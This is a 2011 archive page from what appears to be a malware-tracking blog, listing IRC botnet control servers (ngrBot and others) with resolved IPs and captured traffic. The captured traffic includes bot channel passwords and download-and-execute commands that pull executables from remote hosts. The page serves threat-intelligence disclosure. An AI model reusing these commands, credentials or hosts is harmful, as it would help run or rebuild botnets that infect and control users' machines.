Month: August 2011

www.facebookvideocentral.com(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)

Uncategorized

Resolved : [www.facebookvideocentral.com] To [46.45.164.229] Remote Host Port Number 46.45.164.229 80 NICK 0USAicqigqz JOIN #unk2 …. USER yztwfqz * 0 :yztwfqz MODE 0USAicqigqz -ix Now talking in #unk2 Topic On: [ #unk2 ] [ ] Topic By: [ j ] Now talking in #unk3 Topic On: [ #unk3 ] [ .down http://46.45.164.228/t4.exe c:48o9o8k8s3i8.exe.exe 1 ]Read more...

juegalon.com(ngrBot hosted in Seychelles Ideal Solution Ltd)

Uncategorized

Resolved : [juegalon.com] To [193.107.16.75] Remote Host Port Number 173.208.131.234 80 199.15.234.7 80 65.60.49.28 80 193.107.16.75 1863 PASS ngrBot NICK n{US|XPa}knloiig USER knloiig 0 0 :knloiig JOIN #rjr RjR PRIVMSG #rjr :[DNS]: Blocked 0 domain(s) – Redirected 8 domain(s) PRIVMSG #rjr :[d=”http://173.208.131.234/~dalepapi/ngr18.exe” s=”158208 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataGcxaxg.exe” – Download retries: 0Read more...

kkk.hi5fotos.info(aspergillus mod hosted in Taiwan Taoyuan Taoyuan County Education Network Center)

Uncategorized

Resolved : [kkk.hi5fotos.info] To [163.30.129.25] Resolved : [kkk.hi5fotos.info] To [83.169.40.209] Resolved : [kkk.hi5fotos.info] To [58.19.130.52] Remote Host Port Number 163.30.129.25 4042 195.122.131.8 80 89.200.143.50 80 NICK new[USA|XP|COMPUTERNAME]pdnhwod USER hh “” “lol” :hh JOIN #biznew# PONG 422 PRIVMSG #boss :[d=”http://goo.gl/kg5QG”] Error downloading file [e=”12039″] NICK n{US|XPa}cgveoja USER cgveoja 0 0 :cgveoja JOIN #boss ngrBot JOIN #USRead more...

219.148.138.84(ngrBot hosted in China Hebei Chinanet Hebei Province Network)

Uncategorized

Resolved : [herbal-roidz.com] To [219.148.138.84] Remote Host Port Number 199.15.234.7 80 70.38.98.236 80 70.38.98.239 80 219.148.138.84 5101 PASS hax0r PRIVMSG #ngme :[d=”http://img105.herosh.com/2011/07/09/982279045.gif” s=”19432 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0 * The data identified by the following URLs was then requested from the remote web server: o http://api.wipmania.com/ o http://img102.herosh.com/2011/07/09/166578640.gif oRead more...